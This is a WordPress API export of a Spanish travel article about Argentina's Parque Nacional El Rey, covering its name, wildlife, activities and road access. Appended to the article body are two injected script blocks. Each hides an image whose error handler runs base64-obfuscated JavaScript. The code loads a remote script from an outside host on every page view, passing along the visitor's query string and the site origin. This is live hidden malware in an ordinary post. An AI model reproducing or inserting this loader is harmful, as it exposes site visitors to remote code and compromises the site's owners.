{"id":5246,"date":"2025-06-10T07:48:49","date_gmt":"2025-06-10T10:48:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5246"},"modified":"2025-08-13T23:30:22","modified_gmt":"2025-08-14T02:30:22","slug":"el-paraiso-norteno-que-pocos-conocen-donde-queda-el-parque-nacional-con-nombre-de-rey-y-fauna-salvaje","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5246","title":{"rendered":"El para\u00edso norte\u00f1o que pocos conocen: d\u00f3nde queda el parque nacional con nombre de rey y fauna salvaje"},"content":{"rendered":"\n<p><strong><em>La\u00a0Ruta\u00a0Nacional 9\u00a0es una de las m\u00e1s importantes de\u00a0Argentina\u00a0y a lo largo de su trayecto entre la\u00a0Ciudad de Buenos Aires\u00a0y el l\u00edmite con el vecino pa\u00eds de Bolivia en la frontera nacional ubicada en la provincia de\u00a0Salta, son cientos de lugares que recorre y miles de historias\u00a0pol\u00edticas, sociales, culturales y\u00a0deportivas, entre otras, las que suceden en cada pueblo que conecta con otro entre el\u00a0Obelisco\u00a0y \u00abLa Linda\u00bb.\u00a0<\/em><\/strong><\/p>\n\n\n\n<p>Con el paso de los a\u00f1os, las mismas se reproducen y suman nuevos actores, entre los que est\u00e1n los\u00a0turistas\u00a0que viajan dentro del\u00a0pa\u00eds\u00a0recorriendo las\u00a0<a href=\"https:\/\/www.cronista.com\/tema\/provincias\/\" target=\"_blank\" rel=\"noreferrer noopener\">provincias<\/a>\u00a0llevando su cultura y costumbres en cada aventura que emprenden y, en ellas, se nutren de otras leyendas que enriquecen las\u00a0vacaciones.<\/p>\n\n\n\n<p>En el coraz\u00f3n de Salta, a 197\u00a0kil\u00f3metros al sureste de la capital provincial y a 1.600 kil\u00f3metros del Obelisco porte\u00f1o, se esconde una\u00a0joya natural\u00a0que lleva un t\u00edtulo noble por derecho propio que, justamente, en sus l\u00edmites internos no solo cuida del ecosistema, su\u00a0<a href=\"https:\/\/www.cronista.com\/tema\/flora-y-fauna\/\" target=\"_blank\" rel=\"noreferrer noopener\">flora y fauna<\/a>, sino que, tambi\u00e9n, tiene una particular historia que bajo su nombre recuerda una antiqu\u00edsima realidad que supo pasar en las tierras donde hoy se erige el\u00a0Parque Nacional El Rey. El mismo protege y ampara una de las transiciones ecol\u00f3gicas m\u00e1s ricas del pa\u00eds, entre las Yungas y el Chaco Serrano, como as\u00ed tambi\u00e9n, conecta directamente con la realeza espa\u00f1ola.<\/p>\n\n\n\n<p>Adem\u00e1s, a diferencia de parques m\u00e1s populares como el\u00a0<a href=\"https:\/\/www.cronista.com\/informacion-gral\/cientificos-argentinos-descubrieron-un-barco-hundido-en-el-lago-nahuel-huapi-de-hace-100-anos\/\" target=\"_blank\" rel=\"noreferrer noopener\">Nahuel Huapi<\/a>\u00a0o los Glaciares, El Rey permanece lejos del turismo masivo. Sus senderos poco transitados, sus paisajes v\u00edrgenes y su clima c\u00e1lido subtropical lo convierten en un destino ideal para viajeros que buscan experiencias aut\u00e9nticas y naturaleza sin intermediarios.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/img-s-msn-com.akamaized.net\/tenant\/amp\/entityid\/AA1GoHl7.img?w=617&amp;h=312&amp;m=6\" alt=\"\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Parque Nacional El Rey: cu\u00e1l es su historia y a qu\u00e9 debe su nombre<\/h2>\n\n\n\n<p>Lo que pocos saben, es que este parque recibe su nombre de una antigua finca, una prestigiosa estancia ganadera que, antes de transformarse en \u00e1rea protegida, fue propiedad del coronel don Juan Adri\u00e1n Cornejo, un patriota salte\u00f1o que recibi\u00f3 las tierras como reconocimiento de la&nbsp;<a href=\"https:\/\/www.cronista.com\/tema\/corona-espanola\/\" target=\"_blank\" rel=\"noreferrer noopener\">Corona espa\u00f1ola<\/a>&nbsp;por sus servicios a favor del Rey.&nbsp;<\/p>\n\n\n\n<p>En la estancia se criaban caballos y ganado vacuno de primera l\u00ednea. As\u00ed naci\u00f3 la finca El Rey, cuyos dominios, d\u00e9cadas despu\u00e9s, dar\u00edan lugar al parque&nbsp;nacional hom\u00f3nimo, donde entre sus&nbsp;paisajes y tupida vegetaci\u00f3n se pueden descubrir, en su recorrido, vestigios que dan cuenta del pasado productivo. Asimismo, conocer la historia del cedro que inspir\u00f3 la creaci\u00f3n del Parque es esencial para las bases del vergel salte\u00f1o.<\/p>\n\n\n\n<p>As\u00ed naci\u00f3 el Parque Nacional El Rey, creado en 1948, que protege a m\u00e1s de 44.000 hect\u00e1reas de selvas,&nbsp;bosques y pastizales. Esta \u00e1rea alberga una sorprendente diversidad de fauna, en la que conviven en un ambiente natural y salvaje m\u00e1s de 250 especies entre aves, pumas, tapires, corzuelas y, hasta pecar\u00edes. Su ubicaci\u00f3n estrat\u00e9gica lo convierte en un&nbsp;corredor&nbsp;vital para especies que migran entre ambientes selv\u00e1ticos y secos.<\/p>\n\n\n\n<p>Es sin dudas un para\u00edso para realizar avistaje de aves y fauna en estado silvestre. La historia de esta belleza de la naturaleza cuenta que, adem\u00e1s de su riqueza ecol\u00f3gica, El Rey guarda un legado cultural importante, ya que, fue all\u00ed que antiguos caminos coloniales, ruinas de viejas estancias y relatos de frontera construyen un imaginario que mezcla naturaleza y leyendas, por lo que, caminar por sus senderos es tambi\u00e9n recorrer parte de la historia de Salta y del pa\u00eds.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Parque Nacional El Rey: qu\u00e9 actividades se pueden realizar en el lugar<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/img-s-msn-com.akamaized.net\/tenant\/amp\/entityid\/AA1GoJYt.img?w=728&amp;h=364&amp;m=6\" alt=\"\"\/><\/figure>\n\n\n\n<p>El Parque se puede recorrer en veh\u00edculo, y tambi\u00e9n posee espacios para acampar. Entre las aventuras que se pueden realizar, algunas de ellas son:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Trekking.<\/li>\n\n\n\n<li>Avistaje de flora y fauna.<\/li>\n\n\n\n<li>Ciclismo.<\/li>\n\n\n\n<li>Escalada.<\/li>\n\n\n\n<li>Senderismo.<\/li>\n\n\n\n<li>Cabalgatas.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Parque Nacional El Rey: c\u00f3mo llegar desde Salta capital<\/h2>\n\n\n\n<p>Desde la ciudad de Salta, se accede por la Ruta Nacional 34 hasta la localidad de Lumbreras, y luego por un&nbsp;camino&nbsp;de ripio de unos 60 kil\u00f3metros que atraviesa montes y quebradas hasta llegar al portal del parque.&nbsp;<\/p>\n\n\n\n<p>La mejor \u00e9poca para visitarlo es entre abril y octubre, cuando las lluvias disminuyen y los caminos est\u00e1n en mejores condiciones.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La\u00a0Ruta\u00a0Nacional 9\u00a0es una de las m\u00e1s importantes de\u00a0Argentina\u00a0y a lo largo de su trayecto entre la\u00a0Ciudad de Buenos Aires\u00a0y el l\u00edmite con el vecino pa\u00eds de Bolivia en la frontera nacional ubicada en la provincia de\u00a0Salta, son cientos de lugares que recorre y miles de historias\u00a0pol\u00edticas, sociales, culturales y\u00a0deportivas, entre otras, las que suceden en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5247,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[43],"tags":[],"class_list":{"0":"post-5246","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ambiente-naturaleza"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5246"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5246"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5246\/revisions"}],"predecessor-version":[{"id":6465,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5246\/revisions\/6465"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5247"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5246"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5246"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5246"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}